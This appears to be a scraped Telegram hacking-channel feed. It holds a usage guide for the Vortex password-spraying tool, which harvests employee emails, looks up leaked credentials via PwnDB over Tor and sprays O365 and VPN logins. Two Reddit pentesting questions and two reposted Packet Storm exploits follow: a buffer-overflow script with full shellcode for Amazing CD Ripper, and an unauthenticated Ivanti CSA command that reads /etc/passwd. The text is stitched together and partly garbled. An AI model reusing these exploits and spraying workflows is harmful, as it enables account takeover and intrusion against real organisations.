Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
This kind of behaviour makes Vortex really easy to use. General Workflow Vortex has been designed to adhere to a specific operation workflow, summarized in the below schema:

___________________________
@hacking_Attack
@Hacking_Video
Operations Collect users Collect valid users for a specific target can be done using three different sources: LinkedIn This source has been removed for infringement of LinkedIn user policies. You can still operate on LinkedIn using GoMapEnum (https://github.com/nodauf/GoMapEnum), and then import the email addresses using the import command. Again, please be aware that using this functionality is a breach of the LinkedIn user agreement, as observable at point 8.2 (https://www.linkedin.com/legal/user-agreement#dos) of the LinkedIn user agreement: You agree that you will not: [...] 2. Develop, support or use software, devices, scripts, robots or any other means or processes (including crawlers, browser plugins and add-ons or any other technology) to scrape the Services or otherwise copy profiles and other data from the Services; CrossLinked To partially replace the above functionality, the tool embeds an adapted version of CrossLinked (https://github.com/m8r0wn/CrossLinked). This tool will try to detect employees of a company using Google and Bing. It's certainly not the same as directly searching on LinkedIn, but it's pretty useful. In order to operate correctly, the tool will ask the user which format should be used for usernames (i.e. john.doe, j.doe or d.john) and which is the standard domain used by the target domain. crosslinked -D evilcorp.com -C "Evil Corporation" ,d#####F^ ,yy############yy ^9#######, ,######" y###################by ^9######, ######^ y#####F"" ^"9######y "######] d#####^ ,#####" by klezVirus ^9#####, ^######, ,#####] ,####F yy#######y, ^9####b ^###### [##### ####F ,###F""'"9####, 9####] 9##### #####F [#### ,##F^ yy "###b 9####, ^#####] #####] [###] ### dF""#b ^###] ^####] #####] 9####b [#### 9##, 9bd [#] [##b ##### [##### [##### ####, 9##y, ,y##^ d##F ##### [####] #####b ^####y ^"#####" d###^ ,####] d##### [#####, ^####by ,d###^ d####^ #####F 9#####y "#####byyyyyyd####F^ d####F [#####9 9#####b, ""############"^ ,d####F ,###### ^######b, ""'""'"^ ,d#####F d#####F [+] Select a format for usernames 0: firstlast 1: lastfirst 2: first.last 3: last.first 4: last.f 5: flast 6: lfirst 7: f.last 8: l.first 9: first 10: last $> 2 [*] Starting search on Google and Bing with CrossLinked [>] Searching google for valid employee names at "Evil Corporation" [>] Searching bing for valid employee names at "Evil Corporation" [>] Found 133 LinkedIn accounts! [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c crosslinked -D evilcorp.com -C "Evil Corporation"

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[+] Select a format for usernames
0: firstlast
1: lastfirst
2: first.last
3: last.first
4: last.f
5: flast
6: lfirst
7: f.last
8: l.first
9: first
10: last
$> 2
[*] Starting search on Google and Bing with CrossLinked
[>] Searching google for valid employee names at "Evil Corporation"

___________________________
@hacking_Attack
@Hacking_Video
[>] Searching bing for valid employee names at "Evil Corporation"
[>] Found 133 LinkedIn accounts!
[*] Updating DB ...
[+] Done!
Google This source is operated using a stripped, modified version of theHarvester (https://github.com/klezVirus/vortex/blob/master). The tool will try to extract names/e-mails from Google (Passive Gathering) using Google Dorks, and from the company website (Active Gathering). ] Found 2 mail [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c google -D evilcorp.com

[*] Starting passive/active search on Google
[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com
[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com
[+] Scraping any emails from: https://evilcorp.com
[+] Scraping any emails from: https://www.facebook.com/EvilCorp/
...

[+] 2 unique emails found:
---------------------------
elliot.alderson@evilcorp.com
tyrell.wellick@evilcorp.com
[>] Found 2 mail
[*] Updating DB ...
[+] Done!
PwnDB This source is operated using a ported version of the one implemented in sn0int (https://github.com/kpcyrd/sn0int). Note: this functionality requires to be connected to the TOR network. On Windows, it is possible to use the embedded version provided with Vortex. On Linux, instead, it is necessary to install the tor package (i.e. sudo apt-get install tor on Kali). Start TOR python manage.py -w workspace1 tor -c start

[*] Starting TOR Browser, click on connect
Enumerate on on PwnDB ] Found 493 leaked accounts! [*] Updating DB ... [+] Done!">python manage.py -w workspace1 search -c pwndb -D evilcorp.com

[*] Starting search on PwnDB
[>] Found 493 leaked accounts!
[*] Updating DB ...
[+] Done!
Stop TOR python manage.py -w workspace1 tor -c stop

[*] Stopping TOR browser
Collect endpoints Vortex uses mainly two macro-categories for endpoints: VPN and Microsoft (Office) endpoints. A target can be added both as an Office or VPN endpoint, and Vortex will try and validate the endpoint as an Office, or VPN endpoint, respectively, using a range of validators. Add an office endpoint Let's make it clear with an example. The user needs to attack the target evilcorp.com, and want to check whether the domain is an OWA, Lync, ADFS, or O365 target. python manage.py -w workspace1 office -c add -D evilcorp.com

[#] OWA domain appears to be hosted internally
[+] evilcorp.com is a valid OWA target!
[-] evilcorp.com does not seem a valid LYNK target
[-] evilcorp.com does not seem a valid ADFS target
[-] evilcorp.com does not seem a valid IMAP target
[+] evilcorp.com is a valid O365 target!
Search subdomains for VPN endpoints For VPN endpoints, the user can perform a subdomain search in order to find hosts running VPN Web Logins, like this: ] Found 10 subdomains [$] Elapsed time: 18.360117197036743 [*] Enumerating potential VPN endpoints (HTTPS on 443, 10443) [>] Found 1 hosts running an SSL webserver [$] Elapsed time: 18.916626691818237 [*] Trying to detect hosts with VPN web-login [>] Found 1 hosts with a VPN web login [$] Elapsed time: 32.919618368148804 [*] Updating DB... [+] Adding vpn.evilcorp.com:443 as a pulse target [>] Elapsed time: 18.920615434646606 [+] Done">python manage.py -w workspace1 domain -c enum -D evilcorp.com

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####

___________________________
@hacking_Attack
@Hacking_Video
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[ *] Starting subdomain passive enumeration
[>] Found 10 subdomains
[$] Elapsed time: 18.360117197036743
[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)
[>] Found 1 hosts running an SSL webserver
[$] Elapsed time: 18.916626691818237
[*] Trying to detect hosts with VPN web-login
[>] Found 1 hosts with a VPN web login
[$] Elapsed time: 32.919618368148804
[*] Updating DB...
[+] Adding vpn.evilcorp.com:443 as a pulse target
[>] Elapsed time: 18.920615434646606
[+] Done
Manually add a VPN endpoint To manually add VPN endpoints, of course, specifying the top level domain would probably not be enough. The correct way would be to specify a specific subdomain along with the specific port the VPN Web Server is running on. python manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443

[+] vpn.evilcorp.com:443 is a pulse target!
Perform a password spray or bruteforce attack against OWA, ADFS, LYNC, or O365 To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 4 [*] Running O365Enumerator [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 office -c attack -P passwords.txt

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : owa
1 : lync
2 : imap
3 : adfs
4 : o365
5 : all
$> 4
[*] Running O365Enumerator
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce attack against VPN endpoints To perform a password spray or even bruteforce attack, the only required resource is a password list in the form of a text file, with one password per line. 6 [*] Attacking vpn.evilcorp.com:443 [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid. [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid! [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -P passwords.txt

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F

___________________________
@hacking_Attack
@Hacking_Video
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[ *] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce using leaked credentials As Vortex keeps track of credentials (https://www.kitploit.com/search/label/Credentials) leaked on PwnDB, a user can select to test all leaked credentials instead of providing a password file. However, consider this behaviour is much different to a normal password spray. In a normal password spraying attack, indeed, a single password is tried against all users. In a leaked credentials attack, the leaked credentials is tested against the specific user it was leaked with. So, as an example, if Vortex found the leaks: User Leaks
---------------------------- ----------------------------
elliot.alderson@evilcorp.com ["ISecretlyLoveAngela2020!"]
tom.wellick@evilcorp.com ["Puppy19!", "MySweetJ111!"]
Vortex will operate the following attempts, and just the following: elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020!
tom.wellick@evilcorp.com:Puppy19!
tom.wellick@evilcorp.com:MySweetJ111!
To perform this attack, no password file is needed, but it's required to set the (-L, or --leaks) parameter. 6 [*] Attacking vpn.evilcorp.com:443 [+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid! [-] tyrell.wellick@evilcorp.com:Puppy19! is not valid. [-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid. [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -L

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[*] Choose an e ndpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid!
[-] tyrell.wellick@evilcorp.com:Puppy19! is not valid.
[-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid.
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
That's mostly it. Sometimes the tool can ask for more information before performing an attack, such as selecting the VPN realm/group. Showing results At any time, you can see valid logins you found using the following command: python manage.py db -w workspace1 -c found-logins
[+] Valid Logins Collected:
ID Target E-Mail Password
---- -------------------- ---------------------------- ------------------------
1 vpn.evilcorp.com:443 tom.wellick@evilcorp.com Joanna2021!
2 vpn.evilcorp.com:443 elliot.alderson@evilcorp.com ISecretlyLoveAngela2020!
[+] Done

___________________________
@hacking_Attack
@Hacking_Video
which should i get?
https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/

So.. im getting a laptop, and im gonna use it for bruteforcing and some gaming. So this are the options: Asus Rog strix g15 with -ryzen 9 5900hx -rtx 3060 115w -300hz -16gb ram (ampliable to 32gb dual channel) -rj45 Asus zephyrus g14 with: -ryzen 7 5800hs -rtx 3060 85w -120hz -16gb of ram (ampliable to 24 with 1 slot) -No rj45 So for brute force does the gpu W a deal? Does 16gb ram enough? Or should i upgrade it? If so, does single channel good enough? Is rj45 needed? Thank you in advance View Poll (https://www.reddit.com/poll/tjl48m) submitted by /u/Clyde253 (https://www.reddit.com/user/Clyde253)
[link] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How would I setup a hacking challenge?

I invented this tool (https://github.com/ki4jgt/Inertia), and have been told numerous times that it's insecure/a bad idea. But no one's been able to tell me exactly why. I've asked questions about it on Stackoverflow, and had programmers tell me that's it's not a great idea, and doesn't really secure passwords.

To me, it seems no different than having a password manager, with a master password on your desktop. Can someone tell me what's so bad about this? Or is it just a general feeling everyone has?

How would I challenge people to break it? I haven't changed my GitHub password to Goddard yet, but that's the challenge I have currently.

submitted by /u/ki4jgt
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
DNS Caches not encrypted
https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/

I am working on a testing of a small home based router. I can see that there is dns cache feature enabled on that device where user requests are cached. I have had read about DNSSEC before and I believe cache that is being stored locally on these small routers do not have encryption enabled. My specific questions are: 1. Is this an issue? Theoretically may be since cache responses that are stored in device are not encrypted. 2. Is DNSSEC only way to encrypt those responses? Thank you much in advance. submitted by /u/Creepy-Trust-9581 (https://www.reddit.com/user/Creepy-Trust-9581)
[link] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Amazing CD Ripper 1.2 Buffer Overflow

https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.

MD5 | 109eebb49df171d38123922bad1203d3Download # Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow
# Exploit Author: Hejap Zairy
# Date: 03.08.2022
# Software Link: http://www.shelltoys.com/cd_ripper.exe
# Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python

from pwn import *

buffer = "\x41" * 1016
# 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)

push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll
nops = "\x90" * 15 #515 tshhh theardlooo love Malware
#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff"
#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"
buf = b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer + push_esp + nops + buf + padding
try:
with open("0day_Hejap.txt","wb") as f:
print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("[-]File cannot be created")
# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution

https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Ivanti Endpoint Manager CSA versions 4.5 and 4.6 suffer from an unauthenticated remote code execution vulnerability.

MD5 | 59d3bc20720bd412425b82923627b636

Download
# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529

###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US

Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###

# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video